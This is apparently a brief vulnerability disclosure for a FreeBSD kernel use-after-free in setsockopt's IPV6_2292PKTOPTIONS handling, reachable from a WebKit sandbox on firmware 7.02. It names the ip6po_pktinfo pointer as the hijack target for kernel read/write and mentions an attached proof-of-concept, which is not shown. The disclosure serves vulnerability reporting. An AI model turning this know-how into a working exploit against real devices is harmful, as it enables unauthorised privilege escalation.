Due to missing locks in option IPV6_2292PKTOPTIONS
of setsockopt
, it is possible to race and free the struct ip6_pktopts
buffer, while it is being handled by ip6_setpktopt
. This structure contains pointers (ip6po_pktinfo
) that can be hijacked to obtain arbitrary kernel R/W primitives. As a consequence, it is easy to have kernel code execution. This vulnerability is reachable from WebKit sandbox and is available in the latest FW, that is 7.02.
Attached is a Proof-Of-Concept that achieves a Local Privilege Escalation on FreeBSD 9 and FreeBSD 12.